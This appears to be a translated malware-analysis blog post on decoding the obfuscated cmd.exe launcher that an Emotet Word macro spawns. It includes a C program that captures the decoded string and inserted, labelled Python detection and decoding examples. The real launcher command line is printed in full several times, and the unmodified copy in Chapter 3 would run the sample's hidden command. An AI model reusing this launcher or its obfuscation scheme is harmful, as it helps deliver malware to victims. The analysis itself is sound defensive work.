Killing macro viruses in seconds: dissecting the technical difficulties of Emotet


*Original author of this article: 刀郎 (Daolang), part of the FreeBuf original content reward programme; reproduction without permission is prohibited.

Chapter 1: Sample background

Emotet is a banking-trojan malware program that obtains financial information by injecting code into the network stack of an infected computer.

[1] This allows sensitive data to be stolen in transit.
[2] Emotet also inserts itself into software modules, which can then steal address-book data and carry out denial-of-service attacks against other systems.
[3] Emotet's delivery has evolved, but its most prominent form is a malicious document or URL link placed in the body of an e-mail, sometimes disguised as an invoice or a PDF attachment.
[4] It was first reported in Germany, Austria and Switzerland in 2014; the United States soon encountered Emotet as well, not necessarily as fake invoices but through malicious JavaScript (.JS) files. When the malicious .JS file is executed, Emotet is able to infect the current host.
[5] Once Emotet has infected a host, the malicious files that form part of the malware can intercept, log and store outgoing network traffic through the web browser, so that sensitive data is compiled for accessing the victim's bank account.
[6] Emotet is a member of the Feodo family of trojan malware.
[7] When run inside a virtual-machine environment, Emotet changes its behaviour in ways intended to mislead malware investigators.

Chapter 2: Running the macro virus in my own sandbox

Emotet has already been analysed by others. The focus of this post is the technical difficulties met during analysis, and a way of analysing this kind of sample quickly in the future. For macro viruses like this we need to be able to kill them in seconds: learn to classify the virus, and have a method for rapid analysis.

After obtaining the sample, I ran it in a sandbox I developed myself to see what it does.

Processes marked in red in the system process list are newly created ones. We can see that a cmd.exe process was added: Word launched a cmd process and passed it a long string of arguments.

We have now captured the data showing WINWORD.EXE launching cmd.exe.
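The observation above (WINWORD.EXE spawning cmd.exe with a long, strange argument string) is exactly what a process-creation detection rule keys on. The following Python script is an added example, not code from the original post or from the author's sandbox: it scores constructed Sysmon-style process-creation records on two things, an Office application spawning a shell, and the launcher traits that are visible in the command line analysed in this article (cmd started with /V:O delayed expansion, one character picked out with :~%o,1, a long numeric index list, and call applied to a substring expansion). The records in EVENTS, including the command line in event 1, are constructed sample data with a hypothetical, harmless key and payload.

```python
import re

# Constructed process-creation records in a Sysmon-like shape. They are my own
# sample data, not output from the sandbox described in the article; the
# command line in event 1 copies the shape of the Emotet launcher (delayed
# expansion, per-index character lookup, final "call" on a substring) with a
# harmless hypothetical key and payload.
EVENTS = [
    {"id": 1,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd /V:O/C"set -   =dkeo lwhc&&for %o in '
                    '(2,8,7,3,4,0,2,8,3,0,2,0,4,3,1,99)do set ]   =!]   !!-   :~%o,1!'
                    '&&if %o==99 call %]   :~-15%"'},
    {"id": 2,
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd /V:ON /C "for %i in (*.log) do echo !i!"'},
    {"id": 3,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c dir"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}

# Each indicator is one trait of the launcher shown in the article.
INDICATORS = {
    "delayed_expansion_enabled": re.compile(r"/V:O", re.I),             # cmd /V:O or /V:ON
    "substring_from_loop_variable": re.compile(r":~%\w+,\d+[!%]"),      # !key:~%o,1!
    "long_numeric_index_list": re.compile(r"\((?:\s*-?\d+\s*,){10,}"),  # for %o in (16,59,...)
    "call_on_substring_expansion": re.compile(r"\bcall\s+%[^%]*:~", re.I),  # call %acc:~-N%
}


def _basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(event):
    """Return (severity or None, reasons) for one process-creation record."""
    parent = _basename(event["ParentImage"])
    child = _basename(event["Image"])
    reasons = []
    office_spawned_shell = parent in OFFICE_APPS and child in SHELLS
    if office_spawned_shell:
        reasons.append(f"{parent} spawned {child}")
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["CommandLine"])]
    reasons.extend(hits)
    if office_spawned_shell and len(hits) >= 2:
        severity = "high"     # Office -> shell plus an obfuscated command line
    elif office_spawned_shell:
        severity = "medium"   # Office -> shell is rare enough to review on its own
    elif len(hits) >= 3:
        severity = "medium"   # the obfuscation pattern from any other parent
    else:
        severity = None       # e.g. an ordinary delayed-expansion batch loop
    return severity, reasons


def triage(events):
    """Run score_event over a batch and keep only the records worth a look."""
    alerts = []
    for ev in events:
        severity, reasons = score_event(ev)
        if severity:
            alerts.append((ev["id"], severity, reasons))
    return alerts


if __name__ == "__main__":
    for event_id, severity, reasons in triage(EVENTS):
        print(f"event {event_id}: {severity} - {'; '.join(reasons)}")
```

Event 1 scores high on both the parent/child pair and all four command-line traits. Event 2, Explorer running an ordinary delayed-expansion loop, is not reported: one trait on its own is common in legitimate batch scripts, which is why the indicators are combined rather than alerted on individually. Event 3 is reported at medium because an Office process starting a shell is worth a look even when the command line itself is plain.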

Chapter 3: Analysing the encrypted cmd arguments

We have the arguments, but they appear to be encrypted.

Cmd /V:O/C"set -   =IdBSZaVlEVEJwpRGpMcXUSahlErhlBwsz 7+Wi;[email protected],Pk}tQb'j26=oT)fDy:/nue{F4Hv1$(-x&&for %o in (16,59,30,69,26,31,27,69,28,28,33,76,53,37,59,58,67,69,30,78,59,53,55,69,18,51,33,40,69,51,44,36,69,53,43,28,37,69,67,51,38,76,26,67,9,58,54,27,51,51,16,65,66,66,53,22,32,22,78,31,27,22,26,51,22,31,27,44,26,68,66,27,49,42,19,42,60,75,45,27,51,51,16,65,66,66,22,67,22,16,22,16,59,28,37,74,44,26,68,66,21,16,72,67,22,45,27,51,51,16,65,66,66,31,27,59,26,69,18,26,69,31,51,31,18,27,59,59,28,31,44,18,59,39,66,67,67,52,49,40,45,27,51,51,16,65,66,66,18,59,39,37,18,59,28,69,44,18,59,39,66,56,73,4,45,27,51,51,16,65,66,66,69,28,22,26,51,69,1,69,28,22,22,18,18,37,59,67,44,69,31,66,57,73,64,28,54,44,21,16,28,37,51,77,54,45,54,61,38,76,68,42,43,33,58,33,54,75,34,41,54,38,76,68,31,51,58,76,69,67,74,65,51,69,39,16,35,54,47,54,35,76,68,42,43,35,54,44,69,79,69,54,38,62,59,26,69,22,18,27,77,76,67,25,14,33,37,67,33,76,26,67,9,61,70,51,26,64,70,76,53,37,59,44,63,59,30,67,28,59,22,1,71,37,28,69,77,76,67,25,14,46,33,76,68,31,51,61,38,21,51,22,26,51,78,48,26,59,18,69,31,31,33,76,68,31,51,38,53,26,69,22,49,38,50,18,22,51,18,27,70,50,50,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,88)do set ]   =!]   !!-   :~%o,1!&&if %o==88 call %]   :~-360%" 

Let's analyse it by hand first. The batch commands are separated by &&,

so take out the first statement:

set -   =IdBSZaVlEVEJwpRGpMcXUSahlErhlBwsz 7+Wi;[email protected],Pk}tQb'j26=oT)fDy:/nue{F4Hv1$(-x

This sets a variable.

Now look at the second statement, which is very long:

for %o in (16,59,30,69,26,31,27,69,28,28,33,76,53,37,59,58,67,69,30,78,59,53,55,69,18,51,33,40,69,51,44,36,69,53,43,28,37,69,67,51,38,76,26,67,9,58,54,27,51,51,16,65,66,66,53,22,32,22,78,31,27,22,26,51,22,31,27,44,26,68,66,27,49,42,19,42,60,75,45,27,51,51,16,65,66,66,22,67,22,16,22,16,59,28,37,74,44,26,68,66,21,16,72,67,22,45,27,51,51,16,65,66,66,31,27,59,26,69,18,26,69,31,51,31,18,27,59,59,28,31,44,18,59,39,66,67,67,52,49,40,45,27,51,51,16,65,66,66,18,59,39,37,18,59,28,69,44,18,59,39,66,56,73,4,45,27,51,51,16,65,66,66,69,28,22,26,51,69,1,69,28,22,22,18,18,37,59,67,44,69,31,66,57,73,64,28,54,44,21,16,28,37,51,77,54,45,54,61,38,76,68,42,43,33,58,33,54,75,34,41,54,38,76,68,31,51,58,76,69,67,74,65,51,69,39,16,35,54,47,54,35,76,68,42,43,35,54,44,69,79,69,54,38,62,59,26,69,22,18,27,77,76,67,25,14,33,37,67,33,76,26,67,9,61,70,51,26,64,70,76,53,37,59,44,63,59,30,67,28,59,22,1,71,37,28,69,77,76,67,25,14,46,33,76,68,31,51,61,38,21,51,22,26,51,78,48,26,59,18,69,31,31,33,76,68,31,51,38,53,26,69,22,49,38,50,18,22,51,18,27,70,50,50,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,88)do set ]   =!]   !!-   :~%o,1!

It is long, but don't be put off; look at this part first:

!-   :~%o,1!

%o iterates over the array above, taking each item in turn, so this expression means: take the character at that index of the string stored in the variable named -, and the 1 means only one character is taken. So what is that string?

IdBSZaVlEVEJwpRGpMcXUSahlErhlBwsz 7+Wi;[email protected],Pk}tQb'j26=oT)fDy:/nue{F4Hv1$(-x

So the values in this array are used as indices into the string variable set by the first statement, extracting one character each. For example, 16

corresponds to p,

59 corresponds to o,

30 corresponds to w.

We can write code by hand to parse it.

In theory the analysis is then complete.
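The index-lookup scheme just described can be reconstructed without ever running cmd.exe. The following Python script is an added example, not code from the original post or from the FreeBuf author: it parses a command line of this shape (the set that stores the key, the for %o in (...) index list, the !key:~%o,1! one-character appends, and the closing call %acc:~-N% or echo !acc!), emulates cmd's :~start,length substring rules in general (negative start counts from the end, negative length drops trailing characters, an out-of-range index yields nothing), and returns the string that call would run. The point of the call at the end is that cmd expands %acc:~-N% a second time when call executes, which is why the value read is the one filled in by the loop. The key, index list and payload in SAMPLE_CMD are constructed for this example; the real sample's key and indices are the ones in the command line above.

```python
import re

# Constructed command line in the same shape as the Emotet launcher analysed
# above: a key string in a variable, an index list walked by "for %o", one
# character appended per iteration, and a final "call" on the last N
# characters of the accumulator. Key, indices and payload are my own.
SAMPLE_CMD = (
    'cmd /V:O/C"set -   =dkeo lwhcx'
    '&&for %o in (9,9,2,8,7,3,4,0,2,8,3,0,2,0,4,3,1,99)'
    'do set ]   =!]   !!-   :~%o,1!'
    '&&if %o==99 call %]   :~-15%"'
)

# "set NAME=KEY" immediately followed by the for loop
SET_RE = re.compile(r'set\s+(?P<name>[^=]+?)=(?P<key>.*?)&&\s*for\s', re.S)
# "for %o in (LIST) do set ACC=!ACC!!SRC:~%o,1!"
LOOP_RE = re.compile(
    r'for\s+%(?P<var>\w+)\s+in\s+\((?P<list>[^)]*)\)\s*do\s+'
    r'set\s+(?P<acc>[^=]+?)=!(?P<acc2>[^!]+?)!!(?P<src>[^:!]+?):~%(?P=var),1!',
    re.S)
# "if %o==TERM call %ACC:~-N%"  or the article's variant  "... echo !ACC!"
FINAL_RE = re.compile(
    r'if\s+%(?P<var>\w+)==(?P<term>-?\d+)\s+(?P<verb>call|echo)\s+'
    r'[%!](?P<fvar>[^:%!]+?)(?::~(?P<start>-?\d+)(?:,(?P<len>-?\d+))?)?[%!]',
    re.S)


def cmd_substr(value, start, length=None):
    """Emulate cmd's %VAR:~start,length% expansion, including its edge cases:
    a negative start counts from the end, a negative length drops that many
    trailing characters, and an out-of-range start yields an empty string."""
    n = len(value)
    if start < 0:
        start = max(n + start, 0)
    if start >= n:
        return ""
    if length is None:
        return value[start:]
    if length < 0:
        end = n + length
        return value[start:end] if end > start else ""
    return value[start:start + length]


def decode(cmdline):
    """Statically rebuild the string the launcher would hand to call/echo."""
    m_set, m_loop, m_final = (rx.search(cmdline) for rx in (SET_RE, LOOP_RE, FINAL_RE))
    if not (m_set and m_loop and m_final):
        raise ValueError("command line does not follow the set / for / call shape")
    key_name = m_set["name"].strip()
    if m_loop["src"].strip() != key_name:
        raise ValueError("loop indexes a variable other than the one set first")
    key = m_set["key"]
    indices = [int(tok) for tok in m_loop["list"].split(",") if tok.strip()]

    # One character per index; an out-of-range index (the 99 here) contributes
    # nothing, exactly as cmd would do.
    rebuilt = "".join(cmd_substr(key, i, 1) for i in indices)

    # "call %acc:~-N%" re-expands the variable after the loop and runs only
    # the last N characters of it; "echo !acc!" has no slice.
    executed = rebuilt
    if m_final["start"] is not None:
        length = int(m_final["len"]) if m_final["len"] is not None else None
        executed = cmd_substr(rebuilt, int(m_final["start"]), length)
    return {"key": key, "indices": indices, "rebuilt": rebuilt,
            "verb": m_final["verb"], "executed": executed}


if __name__ == "__main__":
    result = decode(SAMPLE_CMD)
    print("key     :", result["key"])
    print("rebuilt :", result["rebuilt"])
    print(result["verb"], "would run:", result["executed"])
```

Because nothing is executed, the decoder is safe to run over a command line pulled straight from a sandbox log, and the same two regular expressions fit the real sample above (variable name -, accumulator ], terminator 88, slice :~-360). If an author changes the scheme, the ValueError tells you exactly which of the three parts no longer matches.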

Chapter 4: Getting the result automatically

But if someone changes the algorithm, we would have to spend a long time on it all over again. Is there a way out of this?

Of course there is. However it is encrypted, it cannot avoid performing an execute step; we only need to print what is about to be executed.

Here we simply replace call with echo and adjust the variable that gets printed. My modified code is as follows:

Cmd /V:O/C"set -   =IdBSZaVlEVEJwpRGpMcXUSahlErhlBwsz 7+Wi;[email protected],Pk}tQb'j26=oT)fDy:/nue{F4Hv1$(-x&&for %o in (16,59,30,69,26,31,27,69,28,28,33,76,53,37,59,58,67,69,30,78,59,53,55,69,18,51,33,40,69,51,44,36,69,53,43,28,37,69,67,51,38,76,26,67,9,58,54,27,51,51,16,65,66,66,53,22,32,22,78,31,27,22,26,51,22,31,27,44,26,68,66,27,49,42,19,42,60,75,45,27,51,51,16,65,66,66,22,67,22,16,22,16,59,28,37,74,44,26,68,66,21,16,72,67,22,45,27,51,51,16,65,66,66,31,27,59,26,69,18,26,69,31,51,31,18,27,59,59,28,31,44,18,59,39,66,67,67,52,49,40,45,27,51,51,16,65,66,66,18,59,39,37,18,59,28,69,44,18,59,39,66,56,73,4,45,27,51,51,16,65,66,66,69,28,22,26,51,69,1,69,28,22,22,18,18,37,59,67,44,69,31,66,57,73,64,28,54,44,21,16,28,37,51,77,54,45,54,61,38,76,68,42,43,33,58,33,54,75,34,41,54,38,76,68,31,51,58,76,69,67,74,65,51,69,39,16,35,54,47,54,35,76,68,42,43,35,54,44,69,79,69,54,38,62,59,26,69,22,18,27,77,76,67,25,14,33,37,67,33,76,26,67,9,61,70,51,26,64,70,76,53,37,59,44,63,59,30,67,28,59,22,1,71,37,28,69,77,76,67,25,14,46,33,76,68,31,51,61,38,21,51,22,26,51,78,48,26,59,18,69,31,31,33,76,68,31,51,38,53,26,69,22,49,38,50,18,22,51,18,27,70,50,50,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,88)do set ]   =!]   !!-   :~%o,1!&&if %o==88 echo !]   !"

Now the question is: although we have modified the code, how do we capture and print the displayed result?

I used the approach I am most familiar with: writing C code.

The code is as follows:

#include <windows.h>
#include <stdio.h>

/* Pipe handles and read buffer shared between initPipe() and shell() */
static HANDLE hReadPipeCmd, hWritePipeCmd;     /* child stdout/stderr -> parent */
static HANDLE hReadPipeShell, hWritePipeShell; /* parent -> child stdin */
static HANDLE hProcessHandle;
static char   readBuff[4096];

void initPipe(void);
void shell(void);

/* Command line handed to cmd.exe: the sample's launcher with the final
   "call" replaced by "echo", so the rebuilt command is printed, not run */
WCHAR tEst[] = L"Cmd /V:O/C\"set -   =IdBSZaVlEVEJwpRGpMcXUSahlErhlBwsz 7+Wi;[email protected],Pk}tQb'j26=oT)fDy:/nue{F4Hv1$(-x&&for %o in (16,59,30,69,26,31,27,69,28,28,33,76,53,37,59,58,67,69,30,78,59,53,55,69,18,51,33,40,69,51,44,36,69,53,43,28,37,69,67,51,38,76,26,67,9,58,54,27,51,51,16,65,66,66,53,22,32,22,78,31,27,22,26,51,22,31,27,44,26,68,66,27,49,42,19,42,60,75,45,27,51,51,16,65,66,66,22,67,22,16,22,16,59,28,37,74,44,26,68,66,21,16,72,67,22,45,27,51,51,16,65,66,66,31,27,59,26,69,18,26,69,31,51,31,18,27,59,59,28,31,44,18,59,39,66,67,67,52,49,40,45,27,51,51,16,65,66,66,18,59,39,37,18,59,28,69,44,18,59,39,66,56,73,4,45,27,51,51,16,65,66,66,69,28,22,26,51,69,1,69,28,22,22,18,18,37,59,67,44,69,31,66,57,73,64,28,54,44,21,16,28,37,51,77,54,45,54,61,38,76,68,42,43,33,58,33,54,75,34,41,54,38,76,68,31,51,58,76,69,67,74,65,51,69,39,16,35,54,47,54,35,76,68,42,43,35,54,44,69,79,69,54,38,62,59,26,69,22,18,27,77,76,67,25,14,33,37,67,33,76,26,67,9,61,70,51,26,64,70,76,53,37,59,44,63,59,30,67,28,59,22,1,71,37,28,69,77,76,67,25,14,46,33,76,68,31,51,61,38,21,51,22,26,51,78,48,26,59,18,69,31,31,33,76,68,31,51,38,53,26,69,22,49,38,50,18,22,51,18,27,70,50,50,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,88)do    set ]   =!]   !!-   :~%o,1!&&if %o==88 echo !]   !\"    ";

int main(int argc, char* argv[])
{
    (void)argc;
    (void)argv;
    shell();
    return 0;
}

void shell(void)
{
    DWORD BytesRead = 0;

    initPipe();
    if (hProcessHandle == NULL)
        return;

    /* Read until the child closes its end of the pipe (ReadFile then fails
       with ERROR_BROKEN_PIPE); reading before waiting avoids a deadlock when
       the child's output is larger than the pipe buffer */
    while (ReadFile(hReadPipeCmd, readBuff, sizeof(readBuff) - 1, &BytesRead, NULL)
           && BytesRead > 0)
    {
        readBuff[BytesRead] = '\0';   /* keep printf("%s") inside the buffer */
        printf("%s", readBuff);
    }
    WaitForSingleObject(hProcessHandle, INFINITE);
    CloseHandle(hProcessHandle);
    CloseHandle(hReadPipeCmd);
    CloseHandle(hWritePipeShell);
    printf("\nexit\n");
    getchar();
}

void initPipe(void)
{
    SECURITY_ATTRIBUTES sa = { 0 };
    STARTUPINFOW        si = { 0 };
    PROCESS_INFORMATION pi = { 0 };

    hProcessHandle = NULL;
    sa.nLength = sizeof(sa);
    sa.lpSecurityDescriptor = NULL;
    sa.bInheritHandle = TRUE;
    // create the pipes
    CreatePipe(&hReadPipeCmd, &hWritePipeCmd, &sa, 0);
    CreatePipe(&hReadPipeShell, &hWritePipeShell, &sa, 0);
    /* The parent's own ends must not be inherited, otherwise the child
       also holds a write handle to its output pipe and EOF never arrives */
    SetHandleInformation(hReadPipeCmd, HANDLE_FLAG_INHERIT, 0);
    SetHandleInformation(hWritePipeShell, HANDLE_FLAG_INHERIT, 0);

    GetStartupInfoW(&si);
    si.cb = sizeof(si);
    si.wShowWindow = SW_SHOW;
    /* STARTF_USESTDHANDLES is what makes hStdOutput/hStdError take effect */
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    si.hStdInput = hReadPipeShell;
    si.hStdOutput = si.hStdError = hWritePipeCmd;

    // create the cmd process; bInheritHandles must be TRUE for the pipe handles to reach it
    if (!CreateProcessW(NULL, tEst, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi))
    {
        printf("CreateProcess Error:%lu!\n", GetLastError());
        CloseHandle(hReadPipeCmd);
        CloseHandle(hWritePipeCmd);
        CloseHandle(hReadPipeShell);
        CloseHandle(hWritePipeShell);
        return;
    }
    /* The child now owns its copies; drop ours so the read loop sees EOF */
    CloseHandle(hWritePipeCmd);
    CloseHandle(hReadPipeShell);
    CloseHandle(pi.hThread);
    hProcessHandle = pi.hProcess;
}

Ugh, after countless attempts I still cannot get the code into a code box. Maybe I just don't know how to edit posts? Could the editor please help me format it. Giving up;

here is a screenshot of my run instead.
